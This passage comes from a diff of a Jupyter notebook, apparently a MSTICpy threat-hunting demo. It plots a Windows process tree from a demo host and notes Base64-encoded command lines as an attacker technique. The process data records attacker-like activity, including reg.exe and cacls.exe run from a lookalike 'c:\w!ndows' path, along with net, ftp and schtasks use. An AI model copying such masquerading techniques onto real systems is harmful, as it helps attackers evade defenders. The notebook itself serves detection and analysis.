18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x27bc2020-07-10 18:28:47.270000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe0x60c1970-01-01 00:00:00.000000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\userinit.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\"],\"path\":[\"1156\",\"1156/20\",\"1156/20/21\",\"1156/20/21/61\",\"1156/20/21/63\",\"1156/20/21/64\",\"1156/20/21/64/66\",\"1156/20/21/65\",\"1156/20/21/65/67\",\"1156/20/21/68\",\"1156/20/21/68/69\",\"1156/20/21/70\",\"1156/20/21/70/71\",\"1156/20/21/89\",\"1156/20/21/89/100\",\"1156/20/21/89/100/101\",\"1156/20/21/89/102\",\"1156/20/21/89/102/103\",\"1156/20/21/89/104\",\"1156/20/21/89/104/106\",\"1156/20/21/89/105\",\"1156/20/21/89/107\",\"1156/20/21/89/107/108\",\"1156/20/21/89/109\",\"1156/20/21/89/109/111\",\"1156/20/21/89/110\",\"1156/20/21/89/112\",\"1156/20/21/89/112/113\",\"1156/20/21/89/114\",\"1156/20/21/89/114/115\",\"1156/20/21/89/116\",\"1156/20/21/89/116/117\",\"1156/20/21/89/118\",\"1156/20/21/89/119\",\"1156/20/21/89/120\",\"1156/20/21/89/121\",\"1156/20/21/89/647\",\"1156/20/21/89/647/648\",\"1156/20/21/89/649\",\"1156/20/21/89/649/650\",\"1156/20/21/89/651\",\"1156/20/21/89/651/652\",\"1156/20/21/89/653\",\"1156/20/21/89/90\",\"1156/20/21/89/92\",\"1156/20/21/89/93\",\"1156/20/21/89/94\",\"1156/20/21/89/95\",\"1156/20/21/89/96\",\"1156/20/21/89/97\",\"1156/20/21/89/97/99\",\"1156/20/21/89/98\",\"1156/917\"],\"proc_key\":[\"c:\\\\windows\\\\system32\\\\winlogon.exe0x60c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\userinit.exe0x19682020-07-10 18:27:53.417000\",\"c:\\\\windows\\\\explorer.exe0x19a02020-07-10 18:27:53.487000\",\"c:\\\\windows\\\\system32\\\\securityhealthsystray.exe0x9fc2020-07-10 18:28:13.180000\",\"c:\\\\users\\\\timvic\\\\appdata\\\\local\\\\microsoft\\\\onedrive\\\\onedrive.exe0x12402020-07-10 18:28:13.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x24142020-07-10 18:28:14.043000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x24242020-07-10 18:28:14.063000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x241c2020-07-10 18:28:14.060000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x242c2020-07-10 18:28:14.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x24402020-07-10 18:28:14.083000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x244c2020-07-10 18:28:14.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x246c2020-07-10 18:28:14.123000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x24802020-07-10 18:28:14.137000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x24182020-07-10 18:28:47.377000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x24d02020-07-10 18:28:47.387000\",\"c:\\\\windows\\\\system32\\\\net.exe0x24902020-07-10 18:28:47.407000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x24a02020-07-10 18:28:47.417000\",\"c:\\\\windows\\\\system32\\\\net.exe0x21182020-07-10 18:28:47.440000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x26d02020-07-10 18:28:47.453000\",\"c:\\\\windows\\\\system32\\\\findstr.exe0x24202020-07-10 18:28:47.443000\",\"c:\\\\windows\\\\system32\\\\net.exe0x26842020-07-10 18:28:47.480000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x20ac2020-07-10 18:28:47.490000\",\"c:\\\\windows\\\\system32\\\\net.exe0x227c2020-07-10 18:28:47.517000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x21602020-07-10 18:28:47.537000\",\"c:\\\\windows\\\\system32\\\\findstr.exe0xab02020-07-10 18:28:47.517000\",\"c:\\\\windows\\\\system32\\\\net.exe0x1d942020-07-10 18:28:47.563000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x21402020-07-10 18:28:47.570000\",\"c:\\\\windows\\\\system32\\\\net.exe0x146c2020-07-10 18:28:47.593000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x23ac2020-07-10 18:28:47.603000\",\"c:\\\\windows\\\\system32\\\\net.exe0x230c2020-07-10 18:28:47.627000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x4382020-07-10 18:28:47.637000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a382020-07-10 18:28:47.660000\",\"c:\\\\w!ndows\\\\system32\\\\reg.exe0x22682020-07-10 18:28:47.700000\",\"c:\\\\windows\\\\system32\\\\schtasks.exe0x25242020-07-10 18:28:47.740000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20482020-07-10 18:28:47.830000\",\"c:\\\\windows\\\\system32\\\\net.exe0x22c02020-07-10 18:37:39.450000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x1dc82020-07-10 18:37:39.467000\",\"c:\\\\windows\\\\system32\\\\net.exe0x93c2020-07-10 18:37:39.497000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x18142020-07-10 18:37:39.510000\",\"c:\\\\windows\\\\system32\\\\net.exe0x24882020-07-10 18:37:39.530000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x1fb82020-07-10 18:37:39.543000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12142020-07-10 18:37:39.567000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1e442020-07-10 18:28:33.693000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21542020-07-10 18:28:46.953000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x26902020-07-10 18:28:46.973000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x26e42020-07-10 18:28:46.993000\",\"c:\\\\windows\\\\system32\\\\ftp.exe0x279c2020-07-10 18:28:47.080000\",\"c:\\\\w!ndows\\\\system32\\\\cacls.exe0x21d82020-07-10 18:28:47.233000\",\"c:\\\\windows\\\\system32\\\\net.exe0x27bc2020-07-10 18:28:47.270000\",\"c:\\\\windows\\\\system32\\\\net1.exe0x24102020-07-10 18:28:47.343000\",\"c:\\\\windows\\\\system32\\\\findstr.exe0x27202020-07-10 18:28:47.273000\",\"c:\\\\windows\\\\system32\\\\logonui.exe0x15d02020-07-10 19:44:19.440000\"],\"source_index\":[\"1156\",\"20\",\"21\",\"61\",\"63\",\"64\",\"66\",\"65\",\"67\",\"68\",\"69\",\"70\",\"71\",\"89\",\"100\",\"101\",\"102\",\"103\",\"104\",\"106\",\"105\",\"107\",\"108\",\"109\",\"111\",\"110\",\"112\",\"113\",\"114\",\"115\",\"116\",\"117\",\"118\",\"119\",\"120\",\"121\",\"647\",\"648\",\"649\",\"650\",\"651\",\"652\",\"653\",\"90\",\"92\",\"93\",\"94\",\"95\",\"96\",\"97\",\"99\",\"98\",\"917\"],\"source_index_par\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAAAAoGBAAAAAAADAYEAAAAAAAMBgQAAAAAAAwGBAAAAAAABAZ0AAAAAAAMBgQAAAAAAAYGdAAAAAAADAYEAAAAAAAMBnQAAAAAAAwGBAAAAAAAAAaEAAAAAAAMBgQAAAAAAA4GpAAAAAAADAbEAAAAAAAOBqQAAAAAAAAG1AAAAAAADgakAAAAAAAEBtQAAAAAAA4GpAAAAAAADgakAAAAAAAKBtQAAAAAAA4GpAAAAAAADgbUAAAAAAAOBqQAAAAAAA4GpAAAAAAABAbkAAAAAAAOBqQAAAAAAAgG5AAAAAAADgakAAAAAAAMBuQAAAAAAA4GpAAAAAAADgakAAAAAAAOBqQAAAAAAA4GpAAAAAAADgakAAAAAAABCJQAAAAAAA4GpAAAAAAAAgiUAAAAAAAOBqQAAAAAAAMIlAAAAAAADgakAAAAAAAOBqQAAAAAAA4GpAAAAAAADgakAAAAAAAOBqQAAAAAAA4GpAAAAAAADgakAAAAAAAOBqQAAAAAAAYGxAAAAAAADgakAAAAAAAAD4fw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[53]}},\"selected\":{\"id\":\"4118\"},\"selection_policy\":{\"id\":\"4119\"}},\"id\":\"4075\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"children\":[{\"id\":\"4077\"},{\"id\":\"4147\"}]},\"id\":\"4189\",\"type\":\"Row\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"4185\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"editor\":{\"id\":\"4213\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"4214\"},\"title\":\"SubjectUserSid\"},\"id\":\"4194\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"4210\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"4190\"},\"title\":\"TimeGenerated\"},\"id\":\"4191\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"4211\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"4212\"},\"title\":\"SubjectUserName\"},\"id\":\"4193\",\"type\":\"TableColumn\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"4190\",\"type\":\"DateFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"4215\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"4216\"},\"title\":\"SubjectLogonId\"},\"id\":\"4195\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"4217\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"4218\"},\"title\":\"NewProcessId\"},\"id\":\"4196\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"4219\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"4220\"},\"title\":\"NewProcessName\"},\"id\":\"4197\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"4221\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"4222\"},\"title\":\"CommandLine\"},\"id\":\"4198\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"4223\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"4224\"},\"title\":\"ProcessId\"},\"id\":\"4199\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"4225\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"4226\"},\"title\":\"ParentProcessName\"},\"id\":\"4200\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"4227\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"4228\"},\"title\":\"TargetLogonId\"},\"id\":\"4201\",\"type\":\"TableColumn\"},{\"attributes\":{\"columns\":[{\"id\":\"4191\"},{\"id\":\"4193\"},{\"id\":\"4194\"},{\"id\":\"4195\"},{\"id\":\"4196\"},{\"id\":\"4197\"},{\"id\":\"4198\"},{\"id\":\"4199\"},{\"id\":\"4200\"},{\"id\":\"4201\"}],\"height\":150,\"source\":{\"id\":\"4075\"},\"view\":{\"id\":\"4203\"},\"width\":950},\"id\":\"4202\",\"type\":\"DataTable\"},{\"attributes\":{\"source\":{\"id\":\"4075\"}},\"id\":\"4203\",\"type\":\"CDSView\"},{\"attributes\":{\"end\":9,\"start\":1},\"id\":\"4080\",\"type\":\"Range1d\"},{\"attributes\":{\"text\":\"\"},\"id\":\"4207\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"4210\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"4211\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"4212\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"4213\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"4214\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"4215\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"4216\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"4114\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"4217\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"4218\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"4116\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"4118\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"4119\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"4178\",\"type\":\"Dodge\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"4076\"}},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"4178\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"4180\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"4232\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"data_source\":{\"id\":\"4075\"},\"glyph\":{\"id\":\"4139\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4140\"},\"selection_glyph\":null,\"view\":{\"id\":\"4142\"}},\"id\":\"4141\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"4234\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"axis\":{\"id\":\"4088\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"4145\"}},\"id\":\"4091\",\"type\":\"Grid\"},{\"attributes\":{\"source\":{\"id\":\"4075\"}},\"id\":\"4128\",\"type\":\"CDSView\"},{\"attributes\":{\"range\":{\"id\":\"4080\"},\"value\":1.8},\"id\":\"4136\",\"type\":\"Dodge\"},{\"attributes\":{\"below\":[{\"id\":\"4088\"}],\"center\":[{\"id\":\"4091\"},{\"id\":\"4095\"},{\"id\":\"4120\"}],\"left\":[{\"id\":\"4092\"}],\"outline_line_color\":null,\"plot_height\":700,\"plot_width\":900,\"renderers\":[{\"id\":\"4111\"},{\"id\":\"4127\"},{\"id\":\"4134\"},{\"id\":\"4141\"}],\"title\":{\"id\":\"4078\"},\"toolbar\":{\"id\":\"4100\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"4080\"},\"x_scale\":{\"id\":\"4084\"},\"y_range\":{\"id\":\"4082\"},\"y_scale\":{\"id\":\"4086\"}},\"id\":\"4077\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"dimensions\":\"height\"},\"id\":\"4096\",\"type\":\"PanTool\"},{\"attributes\":{\"source\":{\"id\":\"4075\"}},\"id\":\"4142\",\"type\":\"CDSView\"},{\"attributes\":{\"range\":{\"id\":\"4080\"},\"value\":0.1},\"id\":\"4129\",\"type\":\"Dodge\"},{\"attributes\":{\"range\":{\"id\":\"4080\"},\"value\":0.1},\"id\":\"4122\",\"type\":\"Dodge\"},{\"attributes\":{\"below\":[{\"id\":\"4156\"}],\"center\":[{\"id\":\"4159\"},{\"id\":\"4163\"}],\"left\":[{\"id\":\"4160\"}],\"plot_height\":700,\"plot_width\":90,\"renderers\":[{\"id\":\"4182\"}],\"title\":{\"id\":\"4207\"},\"toolbar\":{\"id\":\"4171\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"4148\"},\"x_scale\":{\"id\":\"4152\"},\"y_range\":{\"id\":\"4150\"},\"y_scale\":{\"id\":\"4154\"}},\"id\":\"4147\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"4122\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"4123\"}}},\"id\":\"4126\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"4152\",\"type\":\"LinearScale\"},{\"attributes\":{\"source\":{\"id\":\"4075\"}},\"id\":\"4112\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"4075\"},\"glyph\":{\"id\":\"4109\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4110\"},\"selection_glyph\":null,\"view\":{\"id\":\"4112\"}},\"id\":\"4111\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"4164\",\"type\":\"PanTool\"},{\"attributes\":{\"formatter\":{\"id\":\"4232\"},\"ticker\":{\"id\":\"4157\"},\"visible\":false},\"id\":\"4156\",\"type\":\"LinearAxis\"},{\"attributes\":{\"factors\":[\"BlackHatDemoHos$\",\"timvic\"],\"palette\":[\"#440154\",\"#208F8C\",\"#FDE724\"]},\"id\":\"4076\",\"type\":\"CategoricalColorMapper\"},{\"attributes\":{\"range\":{\"id\":\"4082\"},\"value\":-0.2},\"id\":\"4123\",\"type\":\"Dodge\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"4076\"}},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"4107\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"4109\",\"type\":\"Rect\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"4122\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"4123\"}}},\"id\":\"4125\",\"type\":\"Text\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6]},\"id\":\"4143\",\"type\":\"FixedTicker\"},{\"attributes\":{},\"id\":\"4148\",\"type\":\"DataRange1d\"},{\"attributes\":{\"range\":{\"id\":\"4082\"},\"value\":0.25},\"id\":\"4137\",\"type\":\"Dodge\"},{\"attributes\":{\"axis_line_color\":null,\"formatter\":{\"id\":\"4116\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"4093\"},\"visible\":false},\"id\":\"4092\",\"type\":\"LinearAxis\"},{\"attributes\":{\"end\":54,\"start\":-1},\"id\":\"4150\",\"type\":\"Range1d\"},{\"attributes\":{\"data_source\":{\"id\":\"4075\"},\"glyph\":{\"id\":\"4125\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4126\"},\"selection_glyph\":null,\"view\":{\"id\":\"4128\"}},\"id\":\"4127\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"4098\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"4228\",\"type\":\"StringFormatter\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"4129\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"4130\"}}},\"id\":\"4132\",\"type\":\"Text\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"4136\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"4137\"}}},\"id\":\"4140\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"4154\",\"type\":\"LinearScale\"},{\"attributes\":{\"source\":{\"id\":\"4075\"}},\"id\":\"4135\",\"type\":\"CDSView\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6]},\"id\":\"4145\",\"type\":\"FixedTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"4075\"},\"glyph\":{\"id\":\"4132\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"4133\"},\"selection_glyph\":null,\"view\":{\"id\":\"4135\"}},\"id\":\"4134\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"4157\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"4156\"},\"grid_line_color\":null,\"ticker\":null},\"id\":\"4159\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"4093\",\"type\":\"BasicTicker\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"4136\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"4137\"}}},\"id\":\"4139\",\"type\":\"Text\"},{\"attributes\":{\"formatter\":{\"id\":\"4234\"},\"ticker\":{\"id\":\"4161\"},\"visible\":false},\"id\":\"4160\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"4227\",\"type\":\"StringEditor\"},{\"attributes\":{\"callback\":null},\"id\":\"4099\",\"type\":\"TapTool\"},{\"attributes\":{},\"id\":\"4161\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"4160\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"4163\",\"type\":\"Grid\"},{\"attributes\":{\"label\":{\"field\":\"SubjectUserName\"},\"renderers\":[{\"id\":\"4111\"}]},\"id\":\"4121\",\"type\":\"LegendItem\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"4184\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"4164\"},{\"id\":\"4165\"},{\"id\":\"4166\"},{\"id\":\"4167\"},{\"id\":\"4168\"},{\"id\":\"4169\"},{\"id\":\"4184\"}]},\"id\":\"4171\",\"type\":\"Toolbar\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"4076\"}},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"4107\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"4110\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"4097\",\"type\":\"ResetTool\"},{\"attributes\":{\"items\":[{\"id\":\"4121\"}],\"title\":\"SubjectUserName\"},\"id\":\"4120\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"4165\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"4226\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"4169\",\"type\":\"HelpTool\"},{\"attributes\":{\"range\":{\"id\":\"4082\"},\"value\":0.25},\"id\":\"4130\",\"type\":\"Dodge\"},{\"attributes\":{\"overlay\":{\"id\":\"4170\"}},\"id\":\"4166\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"4129\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"4130\"}}},\"id\":\"4133\",\"type\":\"Text\"},{\"attributes\":{\"axis\":{\"id\":\"4092\"},\"dimension\":1,\"grid_line_color\":\"navy\",\"ticker\":null,\"visible\":false},\"id\":\"4095\",\"type\":\"Grid\"}],\"root_ids\":[\"4204\"]},\"title\":\"Bokeh Application\",\"version\":\"2.1.1\"}};\n",
+       "  var render_items = [{\"docid\":\"799438af-5e81-4052-a89f-44e91b100863\",\"root_ids\":[\"4204\"],\"roots\":{\"4204\":\"bdbb6432-a369-4a7f-9597-02fa889ccf63\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "4204"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Build tree from selected root\n",
+    "proc_tree = ptree.get_descendents(p_tree, ptree.get_roots(p_tree)[ptree.get_roots(p_tree)['NewProcessName']==root_proc_sel.value].iloc[0])\n",
+    "# Visualize the tree\n",
+    "process_tree = nbdisplay.plot_process_tree(data=proc_tree, legend_col=\"SubjectUserName\", show_table=True)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Looking a the processes above we can see some of the command line arguments appear to be Base64 encoded, this is a common technique employed by attackers to hide their activity. MSTICpy includes features to identify and [decode Base64 encoded strings](https://msticpy.readthedocs.io/en/latest/data_analysis/Base64Unpack.html) to allow for effective analysis."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 34,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
